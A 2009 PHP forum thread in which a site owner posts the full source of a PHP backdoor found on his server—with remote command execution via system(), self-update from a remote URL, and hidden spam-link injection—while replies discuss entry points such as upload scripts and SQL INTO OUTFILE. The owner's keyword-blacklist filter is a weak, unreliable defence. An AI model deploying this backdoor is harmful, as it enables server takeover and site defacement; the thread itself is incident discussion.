dreamwest Posted September 17, 2009 Share Posted September 17, 2009 Its been a while since ive had a security breach but Heres something i found on my server today, im assuming is a brute force attack on login form, and its trying to write to .htaccess (permissions now 444). Any ideas on what else it might do?? <?php ignore_user_abort(1); set_time_limit(0); function Clear() { unlink("c"); unlink("1r.txt"); unlink("2r.txt"); unlink("log"); } function Clear2() { $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); $fin = ereg_replace("<!--dd4-->", "", $fin); $fin = ereg_replace("<!--dd5-->", "", $fin); $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin); $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); echo " upt-ok"; } function GetVar($name, &$var) { $var = ""; if (isset($_POST[$name])) $var = $_POST[$name]; if (isset($_GET[$name])) $var = $_GET[$name]; if (($var) =="") return false; else return true; } function GenNew() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; $path = ""; $fr = fopen("1r.txt", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); } else { $fconf = fopen("c", "w+"); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; mkdir($tname); fwrite($fconf, $tname); $pid = 0; $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); } $gname = $sg."sgen.php"; for ($j=$pid; $j<$pid+10; $j++) { $fc = ""; $fp = fopen($gname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $arr = explode("</html>", $fin); //print_r($arr); $curs = trim($arr[1]); $newf = "$tname/$curs/"; echo "$newf"; mkdir($newf); $fnd = fopen("$tname/$curs/$curs".".php", "w+"); fwrite($fnd, $fin); fclose($fnd); fwrite($fr, "$tname/$curs/$curs".".php\n"); } } function Gen2() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); $md = false; if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; if (isset($_GET["md"])) $md = true; $path = ""; $fr = fopen("1r.txt", "a+"); $f2r = fopen("2r.txt", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); $i_dor = trim($fconf[1]); $i_dor = $i_dor+0; } else { $fconf = fopen("c", "w+"); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; mkdir($tname); fwrite($fconf, $tname."\n"); fwrite($fconf, "0\n"); $pid = 0; $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $fht = fopen("$tname/2.js", "w+"); $htname = $sg."2js.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $f1t = fopen("1t", "w+"); $f1tname = $sg."1t.php"; $fp = fopen($f1tname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($f1t, $fin); fclose($f1t); } $i_dor++; $i_dor--; $a1t = file("1t"); $gname = $sg."sgen2.php"; for ($j=$pid; $j<$pid+10; $j++) { $cth = trim($a1t[$i_dor]); $i_dor++; $fc = ""; $fp = fopen($gname."?th=$cth", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $links =""; if (($i_dor<196) || ($i_dor>199)) { for ($y=0; $y<22; $y++) { $rndi = mt_rand(0,299); $rth = trim($a1t[$rndi]); $links .= "<li> <a href='$rth.php'>$rth</a> </li> \n"; } } if ($i_dor==196) { for ($y=0; $y<75; $y++) { $rth = trim($a1t[$y]); $links .= "<li> <a href='$rth.php'>$rth</a> </li> \n"; } } if ($i_dor==197) { for ($y=75; $y<150; $y++) { $rth = trim($a1t[$y]); $links .= "<li> <a href='$rth.php'>$rth</a> </li> \n"; } } if ($i_dor==198) { for ($y=150; $y<225; $y++) { $rth = trim($a1t[$y]); $links .= "<li> <a href='$rth.php'>$rth</a> </li> \n"; } } if ($i_dor==199) { for ($y=225; $y<300; $y++) { $rth = trim($a1t[$y]); $links .= "<li> <a href='$rth.php'>$rth</a></li> \n"; } } $fin = ereg_replace("<LINKS2>", $links, $fin); $curs = $cth; $fnd = fopen("$tname/$curs".".php", "w+"); fwrite($fnd, $fin); fclose($fnd); if (($md) && ($i_dor==196 || $i_dor==197 || $i_dor==198 || $i_dor==199)) { fwrite($fr, "$tname/$curs".".php\n"); } if (($md) && ($i_dor<196 || $i_dor>199) ) { fwrite($f2r, "$tname/$curs".".php\n"); } } $fconf = fopen("c", "w+"); fwrite($fconf, $tname."\n".$i_dor."\n"); fclose($fconf); } function Gen() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; if (isset($_POST["gm"])) $g = $_POST["gm"]; if (isset($_GET["gm"])) $g = $_GET["gm"]; $path = ""; $fr = fopen("1r.txt", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); $cname = trim($fconf[1]); $curs = trim($fconf[2]); $pid = trim($fconf[3]); if ($pid == 100) { $pid = 0; $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); $curs = $g; } } else { $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; $pid = 0; $curs = $g; mkdir($tname); $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); } $gname = $sg."sgen.php"; for ($j=$pid; $j<$pid+10; $j++) { $fp = fopen($gname."?g=$curs", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_$j.php", "w+"); fwrite($fnd, $fin); fclose($fnd); } if ($j==100) { $fp = fopen($gname."?g=$curs&m=1", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_lm.php", "w+"); fwrite($fnd, $fin); fclose($fnd); $map = "$path/$tname/$cname/$curs"."_lm.php"; fwrite($fr,"$map\n"); } $fconf = fopen("c", "w+"); fwrite($fconf, $tname."\n"); fwrite($fconf, $cname."\n"); fwrite($fconf, $curs."\n"); $nj = $j; fwrite($fconf, $nj."\n"); fclose($fconf); } function Update() { if (isset($_GET["name"])) $sname = $_GET["name"]; $thisname = "$sname.php"; if (isset($_POST['u'])) $u = $_POST['u']; if (isset($_GET['u'])) $u = $_GET['u']; $fp = fopen($u, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fthis = fopen($thisname, "w+"); fwrite($fthis, $fin); fclose($fthis); } function Com() { if (isset($_POST['c'])) @system($_POST['c']); if (isset($_GET['c'])) @system($_GET['c']); } function MRepl() { $mpt = ""; $drs = ""; $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; $endtag = "</font></body></html><dd5> "; $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); GetVar("mpt", $mpt); // ??????? ??????????? ???? ???? $fin = preg_replace ("/<\/body>/i", "", $fin); $fin = preg_replace ("/<\/html>/i", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin); $fp = fopen($mpt, "r"); $drs = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) { exit(); } $drs .= $fc; } fclose($fp); $fin = $fin.$begtag; $fin = $fin.$drs; $fin = $fin.$endtag; $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); } function WrTest() { $path = trim($_GET['wr']); $htname = $path."w.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); ; $fout = fopen("w.txt", "w+"); fwrite($fout, $fin); fclose($fout); } function Main() { if (isset($_POST['u']) || isset($_GET['u'])) { Update(); exit(); } if (isset($_POST['c']) || isset($_GET['c'])) { Com(); exit(); } if (isset($_POST['g']) || isset($_GET['g'])) { Gen(); exit(); } if (isset($_POST['g1']) || isset($_GET['g1'])) { GenNew(); exit(); } if (isset($_POST['g2']) || isset($_GET['g2'])) { Gen2(); exit(); } if (isset($_POST['s']) || isset($_GET['s'])) { MRepl(); exit(); } if (isset($_POST['cl']) || isset($_GET['cl'])) { Clear(); exit(); } if (isset($_POST['cl2']) || isset($_GET['cl2'])) { Clear2(); exit(); } if (isset($_POST['wr']) || isset($_GET['wr'])) { WrTest(); exit(); } echo "<ok>"; } Main(); ?> Quote Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/ Share on other sites More sharing options...
.josh Posted September 17, 2009 Share Posted September 17, 2009 well for one thing, you aren't validating any GET or POST vars. At least, not in that script. Quote Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920138 Share on other sites More sharing options...
MadTechie Posted September 17, 2009 Share Posted September 17, 2009 The fact someone got a PHP file on your server proves you need to write some security, Quote Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920327 Share on other sites More sharing options...
dreamwest Posted September 17, 2009 Author Share Posted September 17, 2009 well for one thing, you aren't validating any GET or POST vars. At least, not in that script. I use strip tags and str_replate to sanitize it, and i know that not nearly enough. Ive added this , ill see if that stops it: $username = substr(trim($_POST['username']),0,20); // prevent SQL-injection $username = str_replace('\\','\\\\', $username); $username = str_replace('"','\"', $username); // prevent XSS-attack, Shell-execute and JavaScript execution if (preg_match("/cmd|CREATE|DELETE|DROP|eval|EXEC|File|INSERT|printf/i",$username)) { $username = ''; } if (preg_match("/LOCK|PROCESSLIST|SELECT|shell|SHOW|SHUTDOWN/i",$username)) { $username = ''; } if (preg_match("/SQL|SYSTEM|TRUNCATE|UNION|UPDATE|DUMP/i",$username)) { $username = ''; } if (preg_match("/java|vbscri|embed|onclick|onmouseover|onfocus/i",$username)) { $username = ''; } $password = substr(trim($_POST['password']),0,20); // prevent SQL-injection $password = str_replace('\\','\\\\', $password); $password = str_replace('"','\"', $password); // prevent XSS-attack, Shell-execute and JavaScript execution if (preg_match("/cmd|CREATE|DELETE|DROP|eval|EXEC|File|INSERT|printf/i",$password)) { $password = ''; } if (preg_match("/LOCK|PROCESSLIST|SELECT|shell|SHOW|SHUTDOWN/i",$password)) { $password = ''; } if (preg_match("/SQL|SYSTEM|TRUNCATE|UNION|UPDATE|DUMP/i",$password)) { $password = ''; } if (preg_match("/java|vbscri|embed|onclick|onmouseover|onfocus/i",$password)) { $password = ''; } Quote Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920415 Share on other sites More sharing options...
MadTechie Posted September 17, 2009 Share Posted September 17, 2009 /*No Comment*/ Quote Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920417 Share on other sites More sharing options...
corbin Posted September 17, 2009 Share Posted September 17, 2009 If someone got a file on your server, it obviously wasn't through SQL injection. Quote Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920428 Share on other sites More sharing options...
dreamwest Posted September 18, 2009 Author Share Posted September 18, 2009 If someone got a file on your server, it obviously wasn't through SQL injection. I dont get how they can add not only a php file but a directory, my ftp is 20 chars mixed, i change it every 3 months. I clean post, get, and requests using strip_tags and str_replace, and database queries with mysql_real_escape_string() Im outta ideas on how else they could do it Quote Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920482 Share on other sites More sharing options...
corbin Posted September 18, 2009 Share Posted September 18, 2009 Do you have any file upload scripts? Also, do you store anything in a DB and eval() it? Quote Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920497 Share on other sites More sharing options...
dreamwest Posted September 18, 2009 Author Share Posted September 18, 2009 Do you have any file upload scripts? Also, do you store anything in a DB and eval() it? I do , i allow ppl to upload videos only....and its the only place i haven't checked. Ill do it now Quote Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920516 Share on other sites More sharing options...
play_ Posted September 18, 2009 Share Posted September 18, 2009 Post a link. I'd like to see this video upload form Quote Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920519 Share on other sites More sharing options...
waynew Posted September 19, 2009 Share Posted September 19, 2009 Upload script is probably vulnerable. Either that or your hosting is to blame. I'd go with the latter. Quote Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-921210 Share on other sites More sharing options...
xylex Posted September 20, 2009 Share Posted September 20, 2009 If someone got a file on your server, it obviously wasn't through SQL injection. Not true. SELECT "<?php phpinfo();" INTO OUTFILE hack.php; Quote Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-921588 Share on other sites More sharing options...
corbin Posted September 20, 2009 Share Posted September 20, 2009 Hrmmm, true. I forgot about INTO OUTFILE . Quote Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-921593 Share on other sites More sharing options...
roopurt18 Posted September 20, 2009 Share Posted September 20, 2009 I dont get how they can add not only a php file but a directory, my ftp is 20 chars mixed, i change it every 3 months. And FTP information is sent in plain text from your machine to the server. Quote Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-921603 Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.